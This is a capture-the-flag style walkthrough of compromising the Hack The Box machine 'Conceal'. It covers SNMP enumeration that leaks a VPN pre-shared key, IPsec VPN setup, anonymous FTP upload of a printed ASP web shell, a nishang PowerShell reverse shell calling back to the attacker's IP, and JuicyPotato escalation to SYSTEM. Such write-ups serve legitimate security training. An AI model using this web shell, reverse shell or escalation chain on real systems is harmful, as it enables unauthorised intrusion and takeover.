This particular scan was interesting, it did not return anything VIA our regular nmap scan. When running a UDP scan however we were able to note down some interesting findings.
└─$ sudo nmap -sU 10.10.10.116 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 20:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.14s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
It appears that we have a port 500 isakmp protocol, this appears to have something to do with a key that can be used to establish a VPN connection. Information on this protocol can be found here:
Knowing that this a vulnerable machine from hack the box, it is safe to assume that there is a key somewhere in this box that we can use inorder to establish a VPN connection and gain access to other ports. Rerunning the nmap scan we get the following results.
$ sudo nmap -sU -sC -sV -vv 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 21:00 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.116 [4 ports]
Completed Ping Scan at 21:00, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:00
Completed Parallel DNS resolution of 1 host. at 21:00, 0.06s elapsed
Initiating UDP Scan at 21:00
Scanning 10.10.10.116 [1000 ports]
UDP Scan Timing: About 27.55% done; ETC: 21:02 (0:01:22 remaining)
Discovered open port 500/udp on 10.10.10.116
Completed UDP Scan at 21:01, 50.63s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 1000 services on 10.10.10.116
Service scan Timing: About 0.40% done
Discovered open port 161/udp on 10.10.10.116
Discovered open|filtered port 161/udp on 10.10.10.116 is actually open
Looks like we have another port open, 167 which is SNMP. We can tell that this is a windows machine with the ttl 127 response, if this was another number such as 60something, we would have a linux machine. If it was something like 200 it would be a switch or some sort of networking device.
Enumerating via SNMP
Often SNMP is misconfigured, in order to enumerate via SNMP we can do so with the following command.
Doing so gives us a VPN password hash. Lets take a crack at it at hashes.org and see if we can crack this hash.
Looks like we found a password! Dudecake1. Its safe to assume that this is the VPN Password that we will need to establish the VPN connection.
We can also enumerate using the SNMP check tool with the following command:
──(kali㉿kali)-[~]
└─$ snmp-check 10.10.10.116 130 ⨯
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.10.116
Hostname : Conceal
Description : Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
Contact : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
Location : -
Uptime snmp : 03:30:52.59
Uptime system : 03:30:35.90
System date : 2021-2-13 02:21:41.0
Domain : WORKGROUP
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
0.0.0.0 49670 0.0.0.0 0 listen
10.10.10.116 139 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 500
0.0.0.0 4500
0.0.0.0 5050
0.0.0.0 5353
0.0.0.0 5355
0.0.0.0 60988
10.10.10.116 137
10.10.10.116 138
10.10.10.116 1900
10.10.10.116 53218
127.0.0.1 1900
127.0.0.1 53219
Doing so will give us access to ports that we will not be able to access until we establish a VPN connection. Looks like we will be abusing port 500 and 4500.
Establishing VPN connection
Now that we have the VPN password, lets run ike-scan to enumerate for more valueable information that we can leverage into our VPN connection that we will create.
┌──(kali㉿kali)-[~]
└─$ sudo ike-scan 10.10.10.116 -M
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=eb797c8fbd3ed4a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.4: 1 hosts scanned in 0.124 seconds (8.04 hosts/sec). 1 returned handshake; 0 returned notify
In the SA information we get information regarding the type of encryption, hashing algorithm, group, authentication type and Lifespan. We will need this in order to configure our VPN file down the road. Quick note we can convert the life span via python:
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.14.30 10.10.10.116 : PSK "Dudecake1!"
edit the vi /etc/ipsec.conf file
└─$ sudo cat /etc/ipsec.conf
# Sample VPN connections
conn Conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.14.30
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotoport=tcp
└─$ sudo ipsec up Conceal
initiating Main Mode IKE_SA Conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA Conceal[1] established between 10.10.14.30[10.10.14.30]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10123s
maximum IKE_SA lifetime 10663s
generating QUICK_MODE request 2443783256 [ HASH SA No ID ID ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (188 bytes)
parsed QUICK_MODE response 2443783256 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA Conceal{2} established with SPIs cfea555b_i 1004a842_o and TS 10.10.14.30/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 2443783256 [ HASH ]
connection 'Conceal' established successfully
Once the connection is established, we can check for TCP ports with the following nmap scan.
└─$ nmap -sT -p 445 10.10.10.116 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:35 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Perfect, we have an established connection. Please note, you may need to restart your Kali VM in order to make it work, it took me a while and scratching my head. For some reason, the old school turn it off and on never seems to fail.
Also note, you can not do syn scans over a vpn connection using nmap, so you will have to do a TCP scan as above. Now that we have access less run a full TCP nmap scan and enumerate the results.
└─$ nmap -sT -sC -sV -oN nmap-TCP-VPN-scan 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:45 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8m55s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-13T17:54:27
|_ start_date: 2021-02-12T22:51:05
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.09 seconds
Looks like we have FTP and a Microsoft webserver. Usually this means that it may be vulnerable to file upload exploitation if we have anonymous ftp. We could upload a shell and access this to the webserver, then we can execute some code. Spooky stuff right there. Lets check it out.
Lets check for ftp access.
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
We have access! Next lets check the webserver and see if there could be a file uploads folder somewhere in there. Usually this is something like /upload /uploads.
Uploading Our Shell
Now it is time to upload our shell. Microsoft IIS uses either asp or aspx files, lets try to check both of them out.
──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ echo "test" > test.asp
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.asp
local: test.asp remote: test.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (20.9263 kB/s)
ftp>
Looks like we can upload both, it also appears that there is a time limit in the webserver becuase it deletes files, therefore we must be snappy and quick to run our reverse shell.
Download the following to execute commands:
┌──(kali㉿kali)-[/opt/webshell/asp]
└─$ cat shell.asp
GIF89a$ ;<hTml>
<% if request("miemie")="av" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<style type="text/css">
<!--
#Layer1 {
position:absolute;
left:500px;
top:404px;
width:118px;
height:13px;
z-index:7;
}
.STYLE1 {color: #9900FF}
-->
</style>
<title>Welcome To AK Team</title>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010"
value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
<div id="Layer1">- BY F4ck</div>
</form>
<% end if %>
</hTml>
shell.asp?miemie=av
We are going to upload the following asp file and execute commands.
Now keep in mind, the file is prepared to be removed ever so often, therefore we need to ensure we are ready to continue uploading - by any means necessary. Before we do so, download the following repo to gain access to our shell and copy the following into our ftp folder.
Establishing Reverse Connection
┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cp Invoke-PowerShellTcp.ps1 ~/HTB/Conceal/ftp
┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cd ~/HTB/Conceal/ftp
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ls
asp Invoke-PowerShellTcp.ps1 test.asp test.aspx webshell.asp
Edit the file shell file by adding the following to the bottom of the script.
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv> whoami : ERROR: Unable to get user claims information.
At line:1 char:1
+ whoami /all
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (ERROR: Unable t...ms information.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Notice that SeImpersonatePrivilege is set to Enabled, this means that it is vulnerable to Juicypatato Exploit!
Similarly, just like you downloaded the shell to the webserver, we are going to download the juicypatatoe file via HTTP and execute manually. This will be done via ftp or with the following command.
Note, before doing so, lets find out where on the windows machine the file is stored. We want to do this because it is removed from the folder after a certain amount of time.
It appears to be in the following directory
PS C:\inetpub\wwwroot\upload>
So once it is downloaded, we are going to transfer it to
C:\Users\Destitute\Documents>
If that doesn't work, then we will try to upload it to another folder, but well see how that goes. The way to do this, to be efficent is with the following command after we upload the file
cp C:\inetpub\wwwroot\upload\jp.exe> .
Another way of downloading the file is by executing the following command on our web server.
It will download it from our http server and put it automatically in the set specified path. Really the choice is up to you. In this instance we will be uploading via ftp.
Once it is uploaded into the server you will see the file as follows:
PS C:\Users\Destitute\Documents> dir
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:21 348468 jp.exe
Running the file, you will see that it does not work. The reason is because the file was not uploaded in binary mode. You can specify binary mode in ftp before upload.
PS C:\Users\Destitute\Documents> ./jp.exe
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:21 348468 jp.exe
PS C:\Users\Destitute\Documents> Invoke-PowerShellTcp : Program 'jp.exe' failed to run: The specified executable is not a valid application for this OS
platform.At line:1 char:1
+ ./jp.exe
+ ~~~~~~~~.
At line:127 char:1
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 9001
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShellTcp
Putting FTP into binary mode
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put jp.exe
Copying jp.exe to our desired folder
PS C:\inetpub\wwwroot\upload> dir
Directory: C:\inetpub\wwwroot\upload
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:28 347648 jp.exe
PS C:\inetpub\wwwroot\upload> dir
PS C:\inetpub\wwwroot\upload> cp jp.exe C:\Users\Destitute\Documents
Execute
PS C:\Users\Destitute\Documents> ./jp.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\Users\Destitute\Documents>
We are going to need a few things here.
t we will set *
p a program to launch, something that will execute a reverse shell
l a listening port.
Lets create our program to launch a reverse shell back to kali, yes another reverse shell that will be executed as root. Before we create the program, lets edit ANOTHER .ps1 and change the port where we will be receiving the reverse shell.
Run juicy patato with the following flags. This is going to attempt to get a token that impersonates system and then run our bat file with elevated privleges.
PS C:\Users\Destitute\Documents> ./jp.exe -t * -p spooky.bat -l 7777
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7777
COM -> recv failed with error: 10038
We get a CLSID error in order to fix that, we have to find another CLSID, there are different ones but after obtaing through trial and error you can find a compatible one, one that is most likely to work. We looked at widows 10 enterprise ones
ning on [any] 9002 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.116] 49700
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32>
